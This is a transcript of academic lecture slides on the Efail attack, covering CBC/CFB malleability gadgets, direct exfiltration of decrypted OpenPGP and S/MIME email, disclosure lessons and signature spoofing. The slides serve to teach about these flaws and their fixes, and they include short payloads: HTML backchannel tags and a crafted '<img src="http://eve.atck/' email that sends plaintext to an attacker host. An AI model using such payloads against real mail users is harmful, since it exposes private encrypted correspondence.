Top Banner
Efail attack and its implications Damian Poddebniak 1 , Christian Dresen 1 , Jens Müller 2 , Fabian Ising 1 , Sebastian Schinzel 1 , Simon Friedberger 3 , Juraj Somorovsky 2 , Jörg Schwenk 2 Juraj Somorovsky
94

Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

Jul 06, 2020

Download

Documents

dariahiddleston
Welcome message from author
This document is posted to help you gain knowledge. Please leave a comment to let me know what you think about it! Share it to your friends and learn new things together.
Transcript
Page 1: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

Efail attack and its implications

Damian Poddebniak1, Christian Dresen1, Jens Müller2, Fabian Ising1, Sebastian Schinzel1, Simon Friedberger3, Juraj Somorovsky2, Jörg Schwenk2

Juraj Somorovsky

Page 2: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

About this talk

• Efail: Breaking S/MIME and OpenPGP Email Encryption using Exfiltration Channels. Damian Poddebniak, Christian Dresen, Jens Müller, Fabian Ising, Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018

• Johnny, you are fired! Spoofing OpenPGP and S/MIME Signatures in Email. Jens Müller, Marcus Brinkmann, Damian Poddebniak, Hanno Böck, Sebastian Schinzel, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2019

Page 3: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

3

Email.

Page 4: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

Internet Message Format („Email“)

4

From: Alice

To: Bob

Subject: Breaking News

Congratulations, you have been promoted!

Page 5: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

Multipurpose Internet Mail Extensions (MIME)

5

From: Alice

To: Bob

Subject: Breaking News

Content-Type: text/plain

Congratulations, you have been promoted!

Page 6: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

Multipurpose Internet Mail Extensions (MIME)

6

From: Alice

To: Bob

Subject: Breaking News

Content-Type: multipart/mixed; boundary="BOUNDARY"

--BOUNDARY

Content-type: text/plain

Congratulations, you have been promoted!

--BOUNDARY

Content-type: application/pdf

Contract...

--BOUNDARY--

Page 7: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

smtp.corp1

av1.com

archive.corp1

smtp.corp2

av2.com

archive.corp2

imap.corp1imap.corp2

Page 8: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

imap.corp1

smtp.corp1

av1.com

archive.corp1

Page 9: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

10

There is no such thing as

“My Email”.

Page 10: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

imap.corp1

smtp.corp1

av1.com

archive.corp1

Assumption:

Attacker has access to emails!

Page 11: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

Motivation for using end-to-end encryption

Insecure Transport• TLS might be used – we don’t know!

Nation state attackers (see also lecture given by Tibor)• Massive collection of emails

• Snowden’s global surveillance disclosure

Breach of email provider / email account• Single point of failure

• Aren’t they reading/analyzing my emails anyway?

12

Page 12: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

Two competing standards

OpenPGP (RFC 4880)

• Favored by privacy advocates

• Web-of-trust (no authorities)

S/MIME (RFC 5751)

• Favored by organizations

• Multi-root trust-hierarchies

13

Page 13: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

Signed Email (S/MIME)

14

From: Alice

To: Bob

Subject: Breaking News

Content-Type: multipart/signed; boundary="BOUNDARY“;

protocol="application/pkcs7-signature“

--BOUNDARY

Content-type: text/plain

Congratulations, you have been promoted!

--BOUNDARY

Content-Type: application/pkcs7-signature

Content-Transfer-Encoding: base64

MIAGCSqGSIb3DQEHAqCAMIACAQExDzANBglghkgBZQMEAgEFAD…

OlA9pggcyAAAAAAAAA==

--BOUNDARY--

Page 14: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

Signed Email (S/MIME)

15

From: Alice

To: Bob

Subject: Breaking News

Content-Type: multipart/signed; boundary="BOUNDARY“;

protocol="application/pkcs7-signature“

--BOUNDARY

Content-type: text/plain

Congratulations, you have been promoted!

--BOUNDARY

Content-Type: application/pkcs7-signature

Content-Transfer-Encoding: base64

MIAGCSqGSIb3DQEHAqCAMIACAQExDzANBglghkgBZQMEAgEFAD…

OlA9pggcyAAAAAAAAA==

--BOUNDARY--

Page 15: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

Signed Email (S/MIME)

16

From: Alice

To: Bob

Subject: Breaking News

Content-Type: multipart/signed; boundary="BOUNDARY“;

protocol="application/pkcs7-signature“

--BOUNDARY

Content-type: text/plain

Congratulations, you have been promoted!

--BOUNDARY

Content-Type: application/pkcs7-signature

Content-Transfer-Encoding: base64

MIAGCSqGSIb3DQEHAqCAMIACAQExDzANBglghkgBZQMEAgEFAD…

OlA9pggcyAAAAAAAAA==

--BOUNDARY--

Page 16: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

Signed Email (PGP)

17

From: Alice

To: Bob

Subject: Breaking News

Content-Type: multipart/signed; boundary="BOUNDARY";

protocol="application/pgp-signature“

--BOUNDARY

Content-type: text/plain

Congratulations, you have been promoted!

--BOUNDARY

Content-Type: application/pgp-signature

-----BEGIN PGP SIGNATURE-----

iQE/BAEBAgApBQJbW1tqIhxCcnVjZSBXYXluZSA8YnJ1Y2V3YX…

-----END PGP SIGNATURE-----

--BOUNDARY--

Page 17: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

Encrypted Email (PGP)

18

From: Alice

To: Bob

Subject: Breaking News

Content-Type: multipart/encrypted; boundary="BOUNDARY";

protocol="application/pgp-encrypted";

--BOUNDARY

Content-Type: application/octet-stream; name="encrypted.asc"

Content-Description: OpenPGP encrypted message

Content-Disposition: inline; filename="encrypted.asc"

-----BEGIN PGP MESSAGE-----

hQIMA0Zy9l4Cw+FaAQ//YewiWjMoX2BebbwJQJMJxvHRoF30NjkZe88m9kGts/tn

DgkUPQEgJJJq/K1TwyAvR8tSLq…

-----END PGP MESSAGE-----

--BOUNDARY--

Page 18: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

Known limitations!

Usability

Snowden EffektEnigmailNew keys at keyserverHard for S/MIME

Opsec von Snowden und thegruqVer- und Entschlüsselung nur in separater

Anwendung!

19

New published PGP public keys per month

?

Page 19: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

• https://vimeo.com/56881481

• https://gist.github.com/grugq/03167bed45e774551155

Some tutorials recommend using PGP outside of email client.

Others recommendedEnigmail in defaultsettings (i.e. HTMLswitched on)

PGP and OpSec

20

Page 20: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

21

Page 21: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

Ok, so how about the security?

22

‘06

‘15

‘99

Page 22: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

1. Breaking Email Encryption

1. Malleability Gadget Attacks on S/MIME

2. Malleability Gadget Attacks on OpenPGP

3. Direct Exfiltration Attacks

4. Responsible Disclosure

2. Breaking Email Signatures

1. UI Redressing

2. Identity Binding

3. Conclusions

Overview

23

Page 23: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

2014: Enigmail won’t encrypt.

24

https://sourceforge.net/p/enigmail/forum/support/thread/3e7268a4/

Page 24: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

25

2017: Outlook includes plaintext in encrypted email.

https://www.sec-consult.com/en/blog/2017/10/fake-crypto-microsoft-outlook-smime-cleartext-disclosure-cve-2017-11776/

Page 25: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

2018: Enigmail/PEP won‘t encrypt.

26

https://www.heise.de/security/meldung/c-t-deckt-auf-Enigmail-verschickt-Krypto-Mails-im-Klartext-4180405.html

Page 26: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

Both standards use old crypto

Ciphertext C = Enc(M)

C1

valid/invalid

M = Dec(C)

C2

valid/invalid

…(repeated several times)

Both standards use old crypto

27

Page 27: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

Old crypto has no negative impact

CBC / CFB modes of operation used, but their usage is not exploitable

29

Assumption: Email is non-interactive

Old crypto has no negative impact

Page 28: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

Backchannel

• Any functionality that forces the email client to interact with the network

• HTML/CSS

• JavaScript

• Email header

• Attachment preview

• Certificate verification

30

<img src="http://efail.de"><object data="ftp://efail.de"><style>@import '//efail.de'</style>...XSS cheat sheetsDisposition-Notification-To: [email protected]: http://efail.deX-Image-URL: http://efail.de…OCSP, CRL, intermediate certsPDF, SVG, VCards, etc.

Page 29: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

Windows

Linux

macOS

iOS

Android

Webmail

Webapp

OutlookIBM Notes

PostboxFoxmail

Live MailPegasus

The Bat!Mulberry

eM Client

Thunderbird

EvolutionKMailTrojitá

ClawsMutt

Apple Mail Airmail MailMate

Mail App CanaryMail Outlook

K-9 MailR2Mail

MailDroidNine

GMailOutlook.com

Yahoo!iCloud

GMXHushMail

Mail.ruFastMail

Roundcube

RainLoop AfterLogicHorde IMP

ProtonMailMailfence

MailboxZoHo Mail

leak by defaultask user leak via bypass script execution

Backchannelsfound

W8MailW10MailWLMail

Mailpile

Exchange GroupWise

Evaluation of backchannels in email clients

31

Page 30: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

Attacker model

32

Page 31: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

Attacker model

33

Page 32: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

1. Breaking Email Encryption

1. Malleability Gadget Attacks on S/MIME

2. Malleability Gadget Attacks on OpenPGP

3. Direct Exfiltration Attacks

4. Responsible Disclosure

2. Breaking Email Signatures

1. UI Redressing

2. Identity Binding

3. Conclusions

Overview

34

Page 33: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

S/MIME uses CBC

• Cipher Block Chaining mode of operation

• Not authenticated

• Vulnerable to many attacks (TLS, XML Encryption, SSH)

• Basic problem: malleability

Source: wikipedia

Page 34: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

Malleability of CBC

36

decryption

C1

P0

decryption

C2

P1

C0

Page 35: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

Malleability of CBC

37

decryption

Content-type: te

C1

P0'

decryption

xt/html\nDear Bob

C2

P1

C0'

Page 36: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

Malleability of CBC

38

decryption

Zontent-type: te

C1

P0'

decryption

xt/html\nDear Bob

C2

P1

C0'

Page 37: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

Malleability of CBC

39

C0 ⊕ P0

decryption

0000000000000000

C1

P0'

decryption

xt/html\nDear Bob

C2

P1

CBC Gadget

Page 38: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

Malleability of CBC

40

C0 ⊕ P0⊕ Pc

decryption

<img src=”ev.il/

C1

P0'

decryption

xt/html\nDear Bob

C2

P1

Page 39: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

Malleability of CBC

41

decryption

Content-type: te

C1'

P0'

decryption

Zt/html\nDear Bob

C2

P1'

C0

Page 40: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

Malleability of CBC

42

decryption

????????????????

C1'

P0'

decryption

Zt/html\nDear Bob

C2

P1'

C0

Page 41: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

Practical Attack against S/MIME

43

???????????????? <img "

Content-type: te xt/html\nDear Sir or Madam, the se ecret meeting wi

???????????????? " src="efail.de/

???????????????? Content-type: te xt/html\nDear Sir or Madam, the se

???????????????? ">

Original

Crafted

Page 42: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

44

Practical Attack against S/MIME

Page 43: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

Demo

Page 44: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

1. Breaking Email Encryption

1. Malleability Gadget Attacks on S/MIME

2. Malleability Gadget Attacks on OpenPGP

3. Direct Exfiltration Attacks

4. Responsible Disclosure

2. Breaking Email Signatures

1. UI Redressing

2. Identity Binding

3. Conclusions

Overview

46

Page 45: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

OpenPGP

• OpenPGP uses a variation of CFB-Mode

• Uses integrity protection with MDC (Modification Detection Code)

• Compression is enabled by default

48

Ci

Pi (known)

Ci+1

Pi-1

encryption encryption

XCi

encryption

Pc (chosen) random plaintext? ? ? ? ? ? ? ?

encryption

Page 46: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

RFC4880 on Modification Detection Codes

Page 47: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

Defeating integrity protection

50

Vulnerable Not Vulnerable

Client Plugin (up to version) MDC Stripped MDC Incorrect SEIP -> SE

Outlook 2007 GPG4WIN 3.0.0

Outlook 2010 GPG4WIN

Outlook 2013 GPG4WIN

Outlook 2016 GPG4WIN

Thunderbird Enigmail 1.9.9

Apple Mail (OSX) GPGTools 2018.01

MDC Stripped MDC Incorrect SEIP -> SE

Page 48: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

54

Page 49: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

55

Page 50: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

1. Breaking Email Encryption

1. Malleability Gadget Attacks on S/MIME

2. Malleability Gadget Attacks on OpenPGP

3. Direct Exfiltration Attacks

4. Responsible Disclosure

2. Breaking Email Signatures

1. UI Redressing

2. Identity Binding

3. Conclusions

Overview

56

Page 51: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

Direct exfiltration

• This attack is possible since 2003 in Thunderbird

• Independent of the applied encryption scheme

• Somewhat fixable in implementation

• But works directly in …• Apple Mail / Mail App

• Thunderbird

• Postbox

• …

• The standards do not give any definition for that!

57

Page 52: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

Encrypting

Alice writes a Mail to Bob

From: Alice

To: Bob

Dear Bob,

the meeting tomorrow will be

at 9 o‘clock.

-----BEGIN PGP MESSAGE-----

hQIMA1n/0nhVYSIBARAAiIsX1QsH

ZObL2LopVexVVZ1uvk3wieArHUg…

-----END PGP MESSAGE-----

Alice’s mail program encrypts the email

Direct exfiltration

58

Page 53: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

Original E-Mail

Eve’s attack E-Mail

Content-Type: text/html

<img src="http://eve.atck/

Content-Type: text/html

">

From: Eve

To: Bob

From: Alice

To: Bob

Eve modifies the email and sends it to Bob or AliceEve captures the encrypted mail between Alice and Bob

-----BEGIN PGP MESSAGE-----

hQIMA1n/0nhVYSIBARAAiIsX1QsH

ZObL2LopVexVVZ1uvk3wieArHUg…

-----END PGP MESSAGE-----

Direct exfiltration

59

Page 54: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

Bob’s mail program decrypts the email

Decrypting

Eve’s attack E-Mail

Content-Type: text/html

<img src="http://eve.atck/

Content-Type: text/html

">

From: Eve

To: Bob

Bob’s mail program puts the clear text back into the body

-----BEGIN PGP MESSAGE-----

hQIMA1n/0nhVYSIBARAAiIsX1QsH

ZObL2LopVexVVZ1uvk3wieArHUg…

-----END PGP MESSAGE-----

Dear Bob,

the meeting tomorrow will be

at 9 o‘clock.

Direct exfiltration

60

Page 55: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

Eve’s attack E-Mail

Content-Type: text/html

<img src="http://eve.atck/

Content-Type: text/html

">

Dear Bob,

the meeting tomorrow will be

at 9 o‘clock.

Content-Type: text/html

<img

src="http://eve.atck/Dear

Bob,

the meeting tomorrow will be

at 9 o‘clock.“>

From: Eve

To: Bob

GET /Dear%20Bob%2C%0D%0Athe

%20meeting%20tomorrow%20will

%20be%20at%209%20o%E2%80%98c

lock.

Eve

Direct exfiltration

61

Page 56: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

1. Breaking Email Encryption

1. Malleability Gadget Attacks on S/MIME

2. Malleability Gadget Attacks on OpenPGP

3. Direct Exfiltration Attacks

4. Responsible Disclosure

2. Breaking Email Signatures

1. UI Redressing

2. Identity Binding

3. Conclusions

Overview

62

Page 57: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

63

S/M

IME

Op

enP

GP

Page 58: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

Exfiltrating many emails

Recap:

• Attacker can exfiltrate hundreds of S/MIME or OpenPGP ciphertexts

with single malicious email.

• Victim merely needs to open the email.

• In May 2018, two widely used clients (Apple Mail and Thunderbird)

either

• weren‘t patched or

• patches were insufficient

64

Page 59: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP
Page 60: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

It did not work well

• Embargo broken

• Community angry

• Of course, nobody read the paper

Page 61: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

67

Page 62: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

68

An independent

summary of the

disclosure timeline,

compiled from

public information.

http://flaked.sockpuppet.org/2018/05/16/a-unified-timeline.html

Page 63: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

Disclosure; lessons learnt

1. Stick to a 90 day disclosure deadline.

2. Be careful with disclosure pre-announcements, because:

• People will speculate about the details and

a) underrate/overrate the risk, and

b) spread false information.

• you won‘t be in control of communicating the details.

3. Controlling information flow right after disclosure is essential.

70

Having a website with general information is necessary (logo ???)

Page 64: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

71

How about thecountermeasures?

Page 65: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

S/MIME Version 4.0 (RFC 8551)

• References EFAIL paper

• Recommends the usage of authenticated encryption with AES-GCM

72

Page 66: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

S/MIME Version 4.0 (RFC 8551)

Page 67: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

S/MIME Version 4.0 (RFC 8551)

Page 68: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

OpenPGP - draft-ietf-openpgp-rfc4880bis-07

• Deprecates Symmetrically Encrypted (SE) data packets

• Proposes AEAD protected data packets

• Implementations should not allow users to access erroneous data

75

Page 69: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

How about signatures?

• Encrypt-then-sign?

• Sign-then-encrypt?

…and of course, there are also different problems

Page 70: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

1. Breaking Email Encryption

1. Malleability Gadget Attacks on S/MIME

2. Malleability Gadget Attacks on OpenPGP

3. Direct Exfiltration Attacks

4. Responsible Disclosure

2. Breaking Email Signatures

1. UI Redressing

2. Identity Binding

3. Conclusions

Overview

77

Page 71: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

Motivation

• We already broke email encryption

• The systems are set up;• Configuring S/MIME and PGP is the most challenging part of our research

• How about email signatures?

Page 72: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

Attacker-controlled UI elements

Page 73: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

Signature Spoofing

We attack the presentation and interpretation of email signatures.

We do not attack the underlying cryptography.

80

As a cryptographer, you should consider this as a neat warning that strong crypto is not everything

Page 74: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

Methodology

• 25 clients• PGP and S/MIME• All major platforms

• Developed 5 attack classes:• 3 common• 1 specific to PGP• 1 specific to S/MIME

• Considered 3 forgery classes

Page 75: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

Forgery Classes

● Perfect forgery ◐ Partial forgery ○Weak forgery

82

Page 76: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

Forgery Classes

83

● Perfect forgery ◐ Partial forgery ○Weak forgery

Page 77: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

Forgery Classes

84

● Perfect forgery ◐ Partial forgery ○Weak forgery

